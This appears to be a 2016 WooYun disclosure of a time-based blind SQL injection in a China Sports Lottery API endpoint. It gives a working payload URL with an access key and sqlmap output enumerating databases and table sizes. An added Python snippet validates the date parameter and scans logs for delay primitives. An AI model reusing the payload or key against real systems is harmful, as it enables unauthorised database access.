Vulnerability summary
Vulnerability title: SQL injection in a 竞彩网 (China Sports Lottery) API endpoint, exposing roughly 30 million (3000W) records
Submitted: 2016-04-01 11:21
Fixed: 2016-05-16 11:30
Disclosed: 2016-05-16 11:30
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Vulnerability status: vendor could not be contacted, or vendor actively ignored the report
Tags: none
Vulnerability details, disclosure status:
2016-04-01: Actively contacting the vendor and waiting for the vendor to claim the report; details not publicly disclosed.
2016-05-16: Vendor has actively ignored the vulnerability; details disclosed to the public.
Brief description: 中国竞彩网 is the official information-release platform for China's sports lottery betting games.
Detailed description: the `date` parameter of the following endpoint is injectable (time-based blind; the SLEEP(5) payload delays the response by five seconds):
http://info.sporttery.cn/interface/interface_new.php?a=contents_list&auth_type=key&auth_value=4u5j7k8l-1e3c-d3r6-7t9k-g7h1-4f6f7f3e&date=2011-03-29' AND (SELECT * FROM (SELECT(SLEEP(5)))KHZL)and '9270'='9270&dpc=1&format=json
Proof of vulnerability (sqlmap output):
Parameter: date (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: a=contents_list&auth_type=key&auth_value=4u5j7k8l-1e3c-d3r6-7t9k-g7h1-4f6f7f3e&date=2011-03-29' AND (SELECT * FROM (SELECT(SLEEP(5)))KHZL)and '9270'='9270&dpc=1&format=json
---
[20:55:47] [INFO] the back-end DBMS is MySQL
web application technology: Apache, Apache 2.2.29, PHP 5.3.29
back-end DBMS: MySQL 5.0.12
[20:55:47] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[20:55:47] [INFO] fetching database names
[20:55:47] [INFO] fetching number of databases
[20:55:47] [INFO] resumed: 13
[20:55:47] [INFO] resumed: information_schema
[20:55:47] [INFO] resumed: account
[20:55:47] [INFO] resumed: account_log
[20:55:47] [INFO] resumed: cms_plus
[20:55:47] [INFO] resumed: comments
[20:55:47] [INFO] resumed: data_center
[20:55:47] [INFO] resumed: datacenter
[20:55:47] [INFO] resumed: lottery_cms_plus
[20:55:47] [INFO] resumed: mysql
[20:55:47] [INFO] resumed: sporttery
[20:55:47] [INFO] resumed: star
[20:55:47] [INFO] resumed: test
[20:55:47] [INFO] resumed: virtual_soccer
Database: sporttery
+---------------------------------------+----------+
| Table                                 | Entries  |
+---------------------------------------+----------+
| cdn_apache_log                        | 82547955 |
| tip_fb_three                          | 79317100 |
| lottery_vote_history                  | 33330578 |
| tip_fb_asia                           | 28484126 |
| tc_site_time                          | 20834026 |
| tc_win007_detail                      | 14306822 |
| tc_goal_detail                        | 8345684  |
| tc_goal_change                        | 4953919  |
| tip_bk_two                            | 4760247  |
| fb_spvalue_hhad                       | 4213724  |
| tc_7m_detail                          | 4131791  |
| match_vote                            | 3036335  |
| wx_receive_log                        | 2953996  |
| tip_fb_asia_count                     | 2800716  |
| tip_bk_hdc                            | 2205138  |
| tc_win007_change                      | 1630263  |
| fb_spvalue_crs                        | 1595340  |
| tc_win007_league                      | 1587009  |
| tip_bk_total                          | 1504659  |
| fb_spvalue_ttg                        | 1387881  |
| fb_spvalue_had                        | 1258856  |
| tc_7m_league                          | 1241455  |
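As an added defender-side example (not part of the original report): a strict allow-list check for the `date` parameter, which would have rejected the payload above, plus a scan of Apache access-log lines for the delay primitives (SLEEP, BENCHMARK, pg_sleep) that time-based blind injection relies on. The log lines, client addresses and the BENCHMARK variant are constructed for this example; the report's auth_value is deliberately left out.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access-log lines (not from the report): a benign
# request, the SLEEP()-based payload shape shown in the report, and a
# BENCHMARK() variant that a different scan might have used.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2016:20:55:47 +0800] "GET /interface/interface_new.php?a=contents_list&date=2011-03-29&dpc=1&format=json HTTP/1.1" 200 512
10.0.0.9 - - [01/Apr/2016:20:55:48 +0800] "GET /interface/interface_new.php?a=contents_list&date=2011-03-29%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29KHZL%29and%20%279270%27%3D%279270&dpc=1&format=json HTTP/1.1" 200 512
10.0.0.9 - - [01/Apr/2016:20:55:53 +0800] "GET /interface/interface_new.php?a=contents_list&date=2011-03-29%27%20AND%20BENCHMARK%285000000%2CMD5%281%29%29--%20&dpc=1&format=json HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Delay primitives used by time-based blind injection; the "(" avoids matching
# the bare word "sleep" in ordinary text values.
DELAY_RE = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(", re.IGNORECASE)

def is_valid_date(value: str) -> bool:
    """Strict YYYY-MM-DD allow-list: what the `date` parameter should accept."""
    if not re.fullmatch(r"\d{4}-\d{2}-\d{2}", value):
        return False
    try:
        datetime.strptime(value, "%Y-%m-%d")
        return True
    except ValueError:
        return False

def scan_access_log(text: str) -> list:
    """Return one finding per query parameter carrying a delay primitive.

    parse_qs URL-decodes values, so %28SLEEP%285%29 is inspected as SLEEP(5)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, method, target, status = m.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                hit = DELAY_RE.search(value)
                if hit:
                    findings.append({"client": client, "time": ts, "param": name,
                                     "primitive": hit.group(1).upper(),
                                     "valid_date": is_valid_date(value) if name == "date" else None})
    return findings

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```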
Remediation:
Copyright notice: when reposting, credit the source: 路人甲 @乌云 (WooYun)
Vulnerability response, vendor response: vendor could not be contacted, or vendor actively declined
Vulnerability Rank: 15 (WooYun rating)